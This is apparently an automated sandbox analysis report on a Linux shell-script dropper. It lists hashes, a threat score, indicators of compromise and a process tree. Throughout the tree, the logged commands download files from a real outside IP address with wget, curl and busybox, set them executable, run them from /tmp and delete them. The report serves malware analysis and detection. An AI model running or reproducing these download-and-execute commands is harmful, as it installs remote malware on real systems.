aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6

Analysis

max time kernel
43s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
18/10/2024, 02:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh
Size

10KB
MD5

5df47113727a7b75e9023a09ffc504f2
SHA1

fda1c0a9a5ae07a024ec2e0297ce177c6ac5ad6f
SHA256

aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6
SHA512

858e3b26bc40be548a382d6c9a350b657cab7aedf61fcd04d28c302a0d31d1afb3b1ca6188461cf8051ab9620206bd174c64ec7d538ad532e36734f5088512ce
SSDEEP

192:eWYAVCOCC4urk0c75B4rWYAVCOs5B4STV:edCrrk0c75B4f5B4STV

Score

7^/10

defense_evasion

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1542	chmod
1578	chmod
1626	chmod
1646	chmod
1608	chmod
1652	chmod
1536	chmod
1572	chmod
1664	chmod
1640	chmod
1658	chmod
1670	chmod
1518	chmod
1584	chmod
1602	chmod
1620	chmod
1512	chmod
1524	chmod
1596	chmod
1614	chmod
1634	chmod
1676	chmod
1530	chmod
1548	chmod
1554	chmod
1566	chmod
1560	chmod
1590	chmod

Executes dropped EXE 28 IoCs

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU	curl
File opened for modification	/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP	curl
File opened for modification	/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP	curl
File opened for modification	/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N	curl
File opened for modification	/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O	curl
File opened for modification	/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O	curl
File opened for modification	/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ	curl
File opened for modification	/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N	curl
File opened for modification	/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U	curl
File opened for modification	/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3	curl
File opened for modification	/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ	curl
File opened for modification	/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU	curl
File opened for modification	/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx	curl
File opened for modification	/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf	curl
File opened for modification	/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ	curl
File opened for modification	/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP	curl
File opened for modification	/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe	curl
File opened for modification	/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ	curl
File opened for modification	/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4	curl
File opened for modification	/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4	curl
File opened for modification	/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx	curl
File opened for modification	/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU	curl
File opened for modification	/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU	curl
File opened for modification	/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP	curl
File opened for modification	/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U	curl
File opened for modification	/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3	curl
File opened for modification	/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe	curl
File opened for modification	/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf	curl

/tmp/aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh
/tmp/aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh
1⤵
PID:1503
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1504
- /usr/bin/wget
  wget http://87.120.84.230/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  PID:1505
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  PID:1511
- /bin/chmod
  chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  - File and Directory Permissions Modification
  PID:1512
- /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  ./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  - Executes dropped EXE
  PID:1513
- /bin/rm
  rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://87.120.84.230/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  PID:1515
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  PID:1517
- /bin/chmod
  chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  ./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  - Executes dropped EXE
  PID:1519
- /bin/rm
  rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  PID:1520
- /usr/bin/wget
  wget http://87.120.84.230/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  PID:1521
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  - Writes file to tmp directory
  PID:1522
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  PID:1523
- /bin/chmod
  chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  - File and Directory Permissions Modification
  PID:1524
- /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  ./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  - Executes dropped EXE
  PID:1525
- /bin/rm
  rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  PID:1526
- /usr/bin/wget
  wget http://87.120.84.230/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  PID:1527
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  - Writes file to tmp directory
  PID:1528
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  PID:1529
- /bin/chmod
  chmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  - File and Directory Permissions Modification
  PID:1530
- /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  ./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  - Executes dropped EXE
  PID:1531
- /bin/rm
  rm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  PID:1532
- /usr/bin/wget
  wget http://87.120.84.230/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  PID:1533
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  - Writes file to tmp directory
  PID:1534
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  PID:1535
- /bin/chmod
  chmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  - File and Directory Permissions Modification
  PID:1536
- /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  ./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  - Executes dropped EXE
  PID:1537
- /bin/rm
  rm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://87.120.84.230/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  PID:1539
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  PID:1541
- /bin/chmod
  chmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  ./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  - Executes dropped EXE
  PID:1543
- /bin/rm
  rm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  PID:1544
- /usr/bin/wget
  wget http://87.120.84.230/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  PID:1545
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  - Writes file to tmp directory
  PID:1546
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  PID:1547
- /bin/chmod
  chmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  - File and Directory Permissions Modification
  PID:1548
- /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  ./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  - Executes dropped EXE
  PID:1549
- /bin/rm
  rm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  PID:1550
- /usr/bin/wget
  wget http://87.120.84.230/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  PID:1551
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  - Writes file to tmp directory
  PID:1552
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  PID:1553
- /bin/chmod
  chmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  ./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  - Executes dropped EXE
  PID:1555
- /bin/rm
  rm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  PID:1556
- /usr/bin/wget
  wget http://87.120.84.230/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  PID:1557
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  PID:1559
- /bin/chmod
  chmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  - File and Directory Permissions Modification
  PID:1560
- /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  ./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  - Executes dropped EXE
  PID:1561
- /bin/rm
  rm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  PID:1562
- /usr/bin/wget
  wget http://87.120.84.230/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  PID:1563
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  - Writes file to tmp directory
  PID:1564
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  PID:1565
- /bin/chmod
  chmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  ./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  - Executes dropped EXE
  PID:1567
- /bin/rm
  rm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  PID:1568
- /usr/bin/wget
  wget http://87.120.84.230/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  PID:1569
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  - Writes file to tmp directory
  PID:1570
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  PID:1571
- /bin/chmod
  chmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  - File and Directory Permissions Modification
  PID:1572
- /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  ./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  - Executes dropped EXE
  PID:1573
- /bin/rm
  rm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  PID:1574
- /usr/bin/wget
  wget http://87.120.84.230/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  PID:1575
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  - Writes file to tmp directory
  PID:1576
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  PID:1577
- /bin/chmod
  chmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  - File and Directory Permissions Modification
  PID:1578
- /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  ./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  - Executes dropped EXE
  PID:1579
- /bin/rm
  rm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  PID:1580
- /usr/bin/wget
  wget http://87.120.84.230/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  PID:1581
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  - Writes file to tmp directory
  PID:1582
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  PID:1583
- /bin/chmod
  chmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  ./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  - Executes dropped EXE
  PID:1585
- /bin/rm
  rm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  PID:1586
- /usr/bin/wget
  wget http://87.120.84.230/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  PID:1587
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  - Writes file to tmp directory
  PID:1588
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  PID:1589
- /bin/chmod
  chmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  - File and Directory Permissions Modification
  PID:1590
- /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  ./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  - Executes dropped EXE
  PID:1591
- /bin/rm
  rm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  PID:1592
- /usr/bin/wget
  wget http://87.120.84.230/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  PID:1593
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  - Writes file to tmp directory
  PID:1594
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  PID:1595
- /bin/chmod
  chmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  - File and Directory Permissions Modification
  PID:1596
- /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  ./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  - Executes dropped EXE
  PID:1597
- /bin/rm
  rm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  2⤵
  PID:1598
- /usr/bin/wget
  wget http://87.120.84.230/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  PID:1599
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  - Writes file to tmp directory
  PID:1600
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  PID:1601
- /bin/chmod
  chmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  - File and Directory Permissions Modification
  PID:1602
- /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  ./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  - Executes dropped EXE
  PID:1603
- /bin/rm
  rm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  2⤵
  PID:1604
- /usr/bin/wget
  wget http://87.120.84.230/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  PID:1605
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  - Writes file to tmp directory
  PID:1606
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  PID:1607
- /bin/chmod
  chmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  - File and Directory Permissions Modification
  PID:1608
- /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  ./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  - Executes dropped EXE
  PID:1609
- /bin/rm
  rm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  2⤵
  PID:1610
- /usr/bin/wget
  wget http://87.120.84.230/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  PID:1611
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  - Writes file to tmp directory
  PID:1612
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  PID:1613
- /bin/chmod
  chmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  - File and Directory Permissions Modification
  PID:1614
- /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  ./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  - Executes dropped EXE
  PID:1615
- /bin/rm
  rm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  2⤵
  PID:1616
- /usr/bin/wget
  wget http://87.120.84.230/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  PID:1617
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  - Writes file to tmp directory
  PID:1618
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  PID:1619
- /bin/chmod
  chmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  - File and Directory Permissions Modification
  PID:1620
- /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  ./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  - Executes dropped EXE
  PID:1621
- /bin/rm
  rm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
  2⤵
  PID:1622
- /usr/bin/wget
  wget http://87.120.84.230/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  PID:1623
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  - Writes file to tmp directory
  PID:1624
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  PID:1625
- /bin/chmod
  chmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  - File and Directory Permissions Modification
  PID:1626
- /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  ./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  - Executes dropped EXE
  PID:1627
- /bin/rm
  rm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  2⤵
  PID:1628
- /usr/bin/wget
  wget http://87.120.84.230/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  PID:1629
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  - Writes file to tmp directory
  PID:1630
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  PID:1631
- /bin/chmod
  chmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  - File and Directory Permissions Modification
  PID:1634
- /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  ./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  - Executes dropped EXE
  PID:1635
- /bin/rm
  rm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  2⤵
  PID:1636
- /usr/bin/wget
  wget http://87.120.84.230/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  PID:1637
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  - Writes file to tmp directory
  PID:1638
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  PID:1639
- /bin/chmod
  chmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  - File and Directory Permissions Modification
  PID:1640
- /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  ./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  - Executes dropped EXE
  PID:1641
- /bin/rm
  rm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
  2⤵
  PID:1642
- /usr/bin/wget
  wget http://87.120.84.230/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  PID:1643
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  - Writes file to tmp directory
  PID:1644
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  PID:1645
- /bin/chmod
  chmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  - File and Directory Permissions Modification
  PID:1646
- /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  ./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  - Executes dropped EXE
  PID:1647
- /bin/rm
  rm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
  2⤵
  PID:1648
- /usr/bin/wget
  wget http://87.120.84.230/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  PID:1649
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  - Writes file to tmp directory
  PID:1650
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  PID:1651
- /bin/chmod
  chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  - File and Directory Permissions Modification
  PID:1652
- /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  ./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  - Executes dropped EXE
  PID:1653
- /bin/rm
  rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  2⤵
  PID:1654
- /usr/bin/wget
  wget http://87.120.84.230/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  PID:1655
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  - Writes file to tmp directory
  PID:1656
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  PID:1657
- /bin/chmod
  chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  - File and Directory Permissions Modification
  PID:1658
- /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  ./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  - Executes dropped EXE
  PID:1659
- /bin/rm
  rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  2⤵
  PID:1660
- /usr/bin/wget
  wget http://87.120.84.230/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  PID:1661
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  - Writes file to tmp directory
  PID:1662
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  PID:1663
- /bin/chmod
  chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  - File and Directory Permissions Modification
  PID:1664
- /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  ./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  - Executes dropped EXE
  PID:1665
- /bin/rm
  rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  2⤵
  PID:1666
- /usr/bin/wget
  wget http://87.120.84.230/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  PID:1667
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  - Writes file to tmp directory
  PID:1668
